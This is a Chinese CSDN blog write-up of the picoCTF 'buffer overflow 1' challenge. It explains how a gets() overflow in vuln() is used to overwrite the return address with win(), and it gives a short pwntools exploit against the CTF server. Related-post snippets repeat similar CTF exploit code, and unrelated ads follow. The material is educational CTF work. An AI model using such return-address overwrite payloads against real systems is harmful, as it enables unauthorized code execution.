picoctf Pwn buffer overflow 1

最新推荐文章于 2024-07-10 11:14:52 发布

==Microsoft==

最新推荐文章于 2024-07-10 11:14:52 发布

阅读量237

点赞数

分类专栏： Pwn 文章标签： ctf pwn

本文链接：https://blog.csdn.net/MrTreebook/article/details/123952604

版权

Pwn 专栏收录该内容

57 篇文章 3 订阅

订阅专栏

picoctf Pwn buffer overflow 1

1.IDA反编译看一下
2.checksec检查
3.检查后门函数
4.看一下vuln函数
5.利用思路
6.exp

1.IDA反编译看一下

在这里插入图片描述

2.checksec检查

在这里插入图片描述

3.检查后门函数

在这里插入图片描述

4.看一下vuln函数

在这里插入图片描述

5.利用思路

在vuln函数中有一个gets()函数可以溢出
将放回地址覆盖成win()函数的地址即可
没有canary和pie的保护利用起来非常简单

6.exp

from pwn import *
p = remote("saturn.picoctf.net",57847)
payload = 'a' * (0x28 + 4) + p32(0x080491F6)
p.sendline(payload)
p.interactive()

在这里插入图片描述

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

==Microsoft==

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
打赏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

BugkuCTF-PWN题pwn2-overflow超详细讲解

am_03的博客

08-30

2319

解题思路 1）计算出get_shell_的地址偏移量 2）算出来之后就直接溢出到后门函数知识点 x64函数调用规则解题之前我们先学下linux x64的函数调用规则。 x64机器在调用某个函数前，比如int func(int a, int b, int c, int d, int e, int f, int g, int h)，首先他会把前6个参数从左往右存入到寄存器rdi、rsi、rdx、rcx、r8、r9，其余参数存入到栈里，保存的顺序是从右往左入栈。比如abcdef会存入到寄存器里，然后一次入栈h

CVE-2016-10190 FFmpeg Http协议 heap buffer overflow漏洞分析及利用

axiejundong的博客

12-30

1004

1. 背景FFmpeg是一个著名的处理音视频的开源项目，非常多的播放器、转码器以及视频网站都用到了 FFmpeg 作为内核或者是处理流媒体的工具。2016年末 paulcher 发现FFmpeg三个堆溢出漏洞分别为CVE-2016-10190、CVE-2016-10191以及CVE-2016-10192。本文对CVE-2016-10190进行了详细的分析，是一个学习如何利用堆溢出达到任意代码执行的一

参与评论您还未登录，请先登录后发表或查看评论

PicoCTF_2018_buffer_overflow_1

m0sway的博客

11-28

452

PicoCTF_2018_buffer_overflow_1 使用checksec查看：保护机制全关，看起来没啥难度。扔进IDA中查看：主函数中给出了漏洞函数，跟进查看： gets()函数，栈溢出，s距离ebp0x28 查看下这题的字符串可以发现函数win()：能够直接获取到flag，直接秒了这题。 exp： from pwn import * #start # r = process("../buu/PicoCTF_2018_buffer_overflow_1") r = remote

BUUCTF pwn——PicoCTF_2018_buffer_overflow 1

CNS-Enterprise BCC-1701-J

05-13

111

BUUCTF 做题练习

BUUCTF：PicoCTF_2018_buffer_overflow_1

weixin_51055545的博客

01-05

1385

先放进虚拟机中检查：任何保护机制都没开，放到32位IDA中：主函数很简单，进入vuln()函数看一下: 很明显有溢出，进入栈中看偏移：这里偏移为0x28，我们思路是第一次溢出，去泄露libc地址，再次进行溢出get shell。第一次溢出： io.recvuntil(':') payload = 'A'*0X28 payload += p32(0) payload += p32(printf) payload += p32(main) payload += p32(elf.got.

[BUUCTF]PWN——picoctf_2018_buffer overflow 1

BangSen1的博客

03-20

319

picoctf_2018_buffer overflow 1 例行检查，32位，没开启保护运行一下用IDA打开，检索字符串，看到了flag.txt，跟进找到了调用flag.txt的函数 win_addr=0x80485CB gets函数读入，存在溢出漏洞，覆盖ret为win函数即可 from pwn import* r=remote('node3.buuoj.cn',26185) win_addr=0x80485CB payload='a'*(0x28+4)+p32(win_addr)

[BUUCTF-pwn]——picoctf_2018_buffer overflow 1

Y_peak的博客

03-16

346

[BUUCTF-pwn]——picoctf_2018_buffer overflow 1 简单的栈溢出，返回地址，设置为win就好 exploit from pwn import * p = remote("node3.buuoj.cn",25059) payload = 'a' * (0x28 + 4) + p32(0x080485CB) p.sendline(payload) p.interactive()

安恒杯pwn1

04-25

"安恒杯pwn1" 本文主要讨论的是安恒杯pwn1题目的解决方法。该题目是一个Pwn题目，利用了strcpy函数的栈溢出漏洞来获取shell。首先，我们需要了解题目的基本信息。题目中提供了一个可执行文件pwn1，运行起来后显示...

pwn学习资料整理——ROP技术（pwn_rop1）

08-30

pwn学习资料整理——ROP技术（pwn_rop1）

#WP ELF x86 - Stack buffer overflow - C++ vtables

dydxdz的博客

03-12

1480

题目地址：rootme 0x01 题目分析 Source Code: #include <stdlib.h> #include <stdio.h> #include <string.h> #include <ctype.h> #include <stdio.h> // g++ -m32 ch20.cpp -o ch20 -...

pwn误区的buffer

2301_80361487的博客

07-10

266

buffer溢出的时候，是从栈底到栈顶方向。注意栈顶是闭合的，栈底才是打开的。

gets 函数漏洞执行代码

草草君

11-20

720

gets 函数漏洞执行代码最近学习了 AFL 工具，同时根据进行了gets函数的漏洞执行代码，具体的原理分析准备以后有时间进行详细分析，目前只是做一个记录，主要内容参考自这里. 环境：kali 4.13.0-kali1-amd64 1. 安装工具peda : 在命令行执行 git clone https://github.com/longld/peda.git ~/peda ech...

[BUUCTF]PWN——picoctf_2018_buffer overflow 1/2

mcmuyanga的博客

11-07

492

picoctf_2018_buffer overflow 1 附件步骤：例行检查，32位程序，没开保护本地运行一下程序，看看程序大概的执行情况 32位ida载入，习惯性的检查程序里的字符串，发现有flag.txt，跟进，找到了读出flag的函数，win_addr=0x80485CB 根据运行时看到的字符串找到了输入点 gets函数读入，存在溢出漏洞，覆盖ret为win函数即可 from pwn import * r=remote('node3.buuoj.cn',27200) win_a

pwn入门之二：缓冲溢出

jhycjhyc的专栏

10-23

924

pwn入门二：缓冲溢出环境：cenos6.5 64位，安装了 gcc的32位编译库，cenos运行于文本模式，搭建方法见博文《pwn入门之一：搭建64位centos6.5虚拟机》。一、建立 test1.c，内容如下： #include <stdio.h> main() { char a='a'; char b[10]; gets(b)...

Pwn笔记

caterpillarous的博客

04-18

2667

Pwn笔记 -前言以下内容摘自Wiki: Pwn是一个骇客语法的俚语词，自”own”这个字引申出来的，这个词的含意在于，玩家在整个游戏对战中处在胜利的优势，或是说明竞争对手处在完全惨败的情形下，这个词习惯上在网络游戏文化主要用于嘲笑竞争对手在整个游戏对战中已经完全被击败（例如：”You just got pwned!”）。在骇客行话里，尤其在另外一种电脑技术方面，包括电脑（服务器或...

BS23-287基于Python的期货程序化交易系统的设计与实现-206jhypi.zip

11-06

本系统的开发与设计是基于vue为前端页面核心框架为django/flask，技术方面主要采用了Html、Js、CSS3、python、Mysql。本课题使用Python语言进行开发。代码层面的操作主要在PyCharm中进行，将系统所使用到的表以及数据存储到MySQL数据库中，方便对数据进行操作本课题基于WEB的开发平台 ②前端开发选择：Vue。 ②后端开发选择：python、django/flask。 ③数据库选择：MySQL。 ④开发工具选择：pycharm、Navicat for MySQL。包含了我的信息、用户管理、期货公司管理、开户信息管理、充值信息管理、期货期货信息管理、期货投资管理、取消投资管理、投资风险管理、意见反馈、系统管理

springboot052基于Springboot+Vue旅游管理系统毕业源码案例设计.zip

最新发布

11-06

springboot052基于Springboot+Vue旅游管理系统毕业源码案例设计 1、资源项目源码均已通过严格测试验证，保证能够正常运行； 2、项目问题、技术讨论，可以给博主私信或留言，博主看到后会第一时间与您进行沟通； 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用，尤其对于人工智能、计算机科学与技术等相关专业，更为适合； 4、下载使用后，可先查看README.md或论文文件（如有），本项目仅用作交流学习参考，请切勿用于商业用途。 5、资源来自互联网采集，如有侵权，私聊博主删除。 6、可私信博主看论文后选择购买源代码。 1、资源项目源码均已通过严格测试验证，保证能够正常运行； 2、项目问题、技术讨论，可以给博主私信或留言，博主看到后会第一时间与您进行沟通； 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用，尤其对于人工智能、计算机科学与技术等相关专业，更为适合； 4、下载使用后，可先查看README.md或论文文件（如有），本项目仅用作交流学习参考，请切勿用于商业用途。 5、资源来自互联网采集，如有侵权，私聊博主删除。 6、可私信博主看论文后选择购买源代码。 1、资源项目源码均已通过严格测试验证，保证能够正常运行； 2、项目问题、技术讨论，可以给博主私信或留言，博主看到后会第一时间与您进行沟通； 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用，尤其对于人工智能、计算机科学与技术等相关专业，更为适合； 4、下载使用后，可先查看README.md或论文文件（如有），本项目仅用作交流学习参考，请切勿用于商业用途。 5、资源来自互联网采集，如有侵权，私聊博主删除。 6、可私信博主看论文后选择购买源代码。

Matlab实现牛顿拉夫逊优化算法NRBO-Kmean-Transformer-BiLSTM负荷预测算法研究.rar

11-06

1.版本：matlab2014/2019a/2024a 2.附赠案例数据可直接运行matlab程序。 3.代码特点：参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象：计算机，电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。替换数据可以直接使用，注释清楚，适合新手

【创新未发表】Matlab实现樽海鞘优化算法SSA-GRU实现风电数据预测算法研究.rar

11-06

Mac m1配置pwn

09-02

要在Mac M1上配置pwn环境，你可以按照以下骤进行操作： 1. 首先，需要下载并安装Docker，因为ocker提供了在M1芯片上运行的预览版。去Docker官网下载并安装Docker。 2. 在GitHub上下载并安装bintuils。你可以在Git...